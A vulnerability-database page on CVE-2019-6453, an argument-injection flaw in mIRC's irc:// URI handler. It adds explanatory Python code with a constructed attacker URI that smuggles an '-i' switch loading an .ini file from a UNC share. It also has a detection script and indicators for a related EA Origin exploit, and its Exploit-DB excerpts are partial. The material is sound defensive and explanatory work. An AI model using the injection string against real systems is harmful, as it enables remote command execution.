CVE-2019-6453
Published 2019-02-18
Priority: P2 · CVSS 3.0: 8.1 (High) · Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available · EPSS: 71.78% (99.3rd percentile)
mIRC before 7.55 allows remote command execution by using argument injection through custom URI protocol handlers. The attacker can specify an irc:// URI that loads an arbitrary .ini file from a UNC share pathname. Exploitation depends on browser-specific URI handling (Chrome is not exploitable).
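To make the argument-injection mechanism concrete, here is an added example (not code from the advisory or the PoC repository) that splits a Windows command line the way a shell\open\command URI handler would, and shows how a single unencoded double quote in the URI turns one quoted argument into several. The handler template, the `-i` switch and the share path are assumptions chosen for illustration; `urllib.parse.quote` stands in for the percent-encoding that Chrome applies before launching the handler.

```python
# Added example: Windows-style argv splitting of a custom URI handler command line.
# Not from the advisory or the PoC; the handler template, the "-i" switch and the
# share path below are assumptions chosen to illustrate the mechanism.
from typing import List, Optional
from urllib.parse import quote

# Hypothetical shell\open\command value for the irc:// scheme. Windows substitutes
# the full URI for %1; the quotes are the only thing keeping it a single argument.
HANDLER_TEMPLATE = r'"C:\Program Files (x86)\mIRC\mirc.exe" "%1"'

# Constructed attacker URI: the embedded double quote closes the "%1" argument,
# and what follows is parsed as extra command-line switches for mirc.exe.
# ("-i <file>" is assumed here to be the switch that selects the .ini file.)
RAW_URI = 'irc://" -i \\\\server\\share\\evil.ini'

# What a browser that percent-encodes the URI before launching the handler hands over.
ENCODED_URI = quote(RAW_URI, safe=':/')


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Minimal CommandLineToArgvW-style split: double quotes group text, unquoted
    whitespace separates arguments. Backslash-before-quote escaping is omitted
    because none of the inputs here rely on it."""
    args: List[str] = []
    cur: List[str] = []
    in_quotes = False
    have_token = False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            have_token = True          # "" still yields an (empty) argument
        elif ch in ' \t' and not in_quotes:
            if have_token:
                args.append(''.join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        args.append(''.join(cur))
    return args


def argv_for_uri(uri: str) -> List[str]:
    """argv mirc.exe would receive for a given URI under HANDLER_TEMPLATE."""
    return split_windows_cmdline(HANDLER_TEMPLATE.replace('%1', uri))


def injected_ini_path(argv: List[str]) -> Optional[str]:
    """Return the UNC .ini path if an injected -i switch points at one, else None."""
    for i in range(1, len(argv) - 1):
        if argv[i].lower() == '-i':
            target = argv[i + 1]
            if target.startswith('\\\\') and target.lower().endswith('.ini'):
                return target
    return None


if __name__ == '__main__':
    for label, uri in (('raw (Edge/Firefox style)', RAW_URI),
                       ('encoded (Chrome style)', ENCODED_URI)):
        argv = argv_for_uri(uri)
        print(f'{label}: argc={len(argv)} injected={injected_ini_path(argv)!r}')
```

The raw URI yields four argv entries (the executable, `irc://`, `-i` and the UNC path), while the percent-encoded one stays a single opaque argument, which is exactly the browser dependence the advisory describes. Because encoding behaviour varies between browsers, the handler side cannot rely on it: the application receiving `%1` has to treat the whole value as data rather than as a command line fragment.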
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mirc | mirc | < 7.55 | 7.55 |
Detection & IOCs (extracted from sources)
Detection items for CVE-2019-6453 (mIRC):
- mIRC is exploitable through argument injection in the irc:// URI handler, which makes it load an arbitrary .ini file from a UNC share path. Monitor for mIRC process launches whose command line carries a UNC path argument (\\server\share\*.ini).
- Exploitation is browser-dependent: Chrome percent-encodes the URI before passing it to the application, so the injected quote and switch never reach mIRC's command line; Edge and Firefox are confirmed vulnerable. Focus detection on Edge and Firefox process trees spawning mIRC.
- Only mIRC versions before 7.55 are affected; fixed in 7.55.

Detection items from the related EA Origin exploit (CVE-2019-12828, indexed under Exploit-DB below), which applies the same URI-handler argument-injection technique to Origin.exe, a Qt application:
- Monitor for Origin.exe spawned with -platformpluginpath pointing to a UNC/remote Windows share path, which indicates remote Qt plugin (DLL) loading for code execution.
- Monitor SMB/UNC share access (\\<remote>\imageformats\*.dll) initiated by Origin.exe, indicating remote Qt plugin loading as part of exploitation.
- Alert on Origin.exe process creation with the /noUpdate and /StartClientMinimized flags combined, which the source describes as an evasion pattern used in exploitation.
- Remote Qt plugin loading requires the backdoored DLL to reside in a valid Qt plugin subdirectory (e.g. imageformats/) on the remote share and to carry a valid .qtmetad section; otherwise Qt will not load it.
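The monitoring items above can be expressed as a small process-creation check. The following is an added example, not code from any of the indexed sources: it evaluates constructed Sysmon-style Event ID 1 records (Image, ParentImage, CommandLine), flags mirc.exe launched with a UNC .ini path on its command line (rated higher when the parent is Edge or Firefox, per the browser caveat), and flags Origin.exe launched with -platformpluginpath pointing at a UNC share or with the /noUpdate + /StartClientMinimized pair. Field names follow Sysmon; the hosts, paths and parent processes in the sample events are made up.

```python
# Added example: evaluate Sysmon-style process-creation events against the
# CVE-2019-6453 / EA Origin indicators listed above. Not from the indexed sources;
# the sample events and their hosts/paths are constructed for this example.
import re
from typing import Dict, List, Tuple

# \\server\share\... anywhere in a command line (stops at whitespace or a quote)
UNC_RE = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')
# Qt's -platformpluginpath switch followed by a UNC path (optionally quoted)
PLUGINPATH_RE = re.compile(r'-platformpluginpath\s+"?(\\\\[^\s"]+)', re.IGNORECASE)

# Browser parents for which the irc:// injection is known to reach mIRC unencoded.
INJECTING_BROWSERS = {'microsoftedge.exe', 'microsoftedgecp.exe', 'msedge.exe', 'firefox.exe'}

Finding = Tuple[str, str, str]  # (rule, severity, artifact)


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[Finding]:
    """Return the findings for one process-creation event."""
    image = basename(event.get('Image', ''))
    parent = basename(event.get('ParentImage', ''))
    cmd = event.get('CommandLine', '')
    findings: List[Finding] = []

    if image == 'mirc.exe':
        # Injected "-i \\server\share\x.ini": any UNC path ending in .ini on mIRC's command line.
        ini_paths = [p for p in UNC_RE.findall(cmd) if p.lower().endswith('.ini')]
        if ini_paths:
            # Chrome encodes the URI, so a Chrome parent makes injection unlikely; Edge/Firefox do not.
            severity = 'high' if parent in INJECTING_BROWSERS else 'medium'
            findings.append(('mirc_unc_ini_argument', severity, ini_paths[0]))

    if image == 'origin.exe':
        m = PLUGINPATH_RE.search(cmd)
        if m:
            findings.append(('origin_remote_platformpluginpath', 'high', m.group(1)))
        low = cmd.lower()
        if '/noupdate' in low and '/startclientminimized' in low:
            findings.append(('origin_noupdate_startclientminimized', 'low', ''))

    return findings


# Constructed sample events (hosts, paths and parents are made up).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # irc:// injection reaching mIRC from Firefox
        'Image': r'C:\Program Files (x86)\mIRC\mirc.exe',
        'ParentImage': r'C:\Program Files\Mozilla Firefox\firefox.exe',
        'CommandLine': r'"C:\Program Files (x86)\mIRC\mirc.exe" "irc://" -i \\10.0.0.5\pub\mirc.ini"',
    },
    {   # benign interactive launch
        'Image': r'C:\Program Files (x86)\mIRC\mirc.exe',
        'ParentImage': r'C:\Windows\explorer.exe',
        'CommandLine': r'"C:\Program Files (x86)\mIRC\mirc.exe"',
    },
    {   # Origin launched with a remote Qt plugin path plus the flag pair
        'Image': r'C:\Program Files (x86)\Origin\Origin.exe',
        'ParentImage': r'C:\Program Files (x86)\Microsoft\Edge\msedge.exe',
        'CommandLine': r'"C:\Program Files (x86)\Origin\Origin.exe" -platformpluginpath \\10.0.0.5\pub /noUpdate /StartClientMinimized',
    },
    {   # same URI from Chrome: percent-encoded, so no UNC path ever reaches argv
        'Image': r'C:\Program Files (x86)\mIRC\mirc.exe',
        'ParentImage': r'C:\Program Files\Google\Chrome\Application\chrome.exe',
        'CommandLine': r'"C:\Program Files (x86)\mIRC\mirc.exe" "irc://%22%20-i%20%5C%5C10.0.0.5%5Cpub%5Cmirc.ini"',
    },
]


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, Finding]]:
    """Index every finding by the position of its event."""
    return [(i, f) for i, ev in enumerate(events) for f in evaluate(ev)]


if __name__ == '__main__':
    for idx, (rule, sev, artifact) in scan(SAMPLE_EVENTS):
        print(f'event {idx}: {sev:6} {rule} {artifact}')
```

The check works on the raw CommandLine string rather than on argv so it matches whatever quoting the handler used; the Chrome-parent event produces no finding because the percent-encoded URI contains no literal backslashes, which is the same reason the injection fails there.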
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 8.1 | HIGH | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
No detection rules found.
Exploit-DB
EA Origin < 10.5.38 - Remote Code Execution
exploitdb · 2019-06-21 · CVSS 7.8 · CVE-2019-12828 [HIGH]
Product: EA Origin
You can read more about how that exploit was discovered and exploited here:
[https://proofofcalc.com/cve-2019-6453-mIRC/](https://proofofcalc.com/cve-2019-6453-mIRC/)

Anyways, for this example with Origin, we're just going to spin up a fresh Windows 8 box and use IE11. We'll talk more about bypassing modern security mechanisms later.

## The Payload

So now that we've spun up our virtual machine, make sure you have Origin installed. Open a notepad, and paste the following:

```
```

Open it in Internet Explorer, and allow Origin to launch (if it even prompts, lol). You should see the following.

![Origin window icons loading in reverse](https://zeropwn.github.io/assets/origin_reverse.png)

As you can see in the image above, the window icons are now loading in reverse. I failed to mention this, however "-revers
Exploit-DB
mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution
exploitdb · 2019-02-18 · CVSS 8.1 · CVE-2019-6453 [HIGH]
Product: mIRC
Affected versions
This PoC runs for mIRC < 7.55.
You can trigger the PoC on Edge 42.17134 (last preview version) and Firefox 64.0.2 (last release). It doesn't work on Chrome because of the way Chrome handles URI protocols (the URI is encoded before being passed to the application).
References
Further explanation (including proof of concept code):
Write-up: https://proofofcalc.com/cve-2019-6453-mIRC/
PoC: https://github.com/proofofcalc/cve-2019-6453-poc
mIRC changelog: https://www.mirc.com/whatsnew.txt
Authors
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
No writeups or analysis indexed.
Sources
- https://github.com/proofofcalc/cve-2019-6453-poc
- https://proofofcalc.com/advisories/20190218.txt
- https://proofofcalc.com/cve-2019-6453-mIRC/
- https://twitter.com/proofofcalc/status/1097518413143003136
- https://www.exploit-db.com/exploits/46392/
- https://www.mirc.com/news.html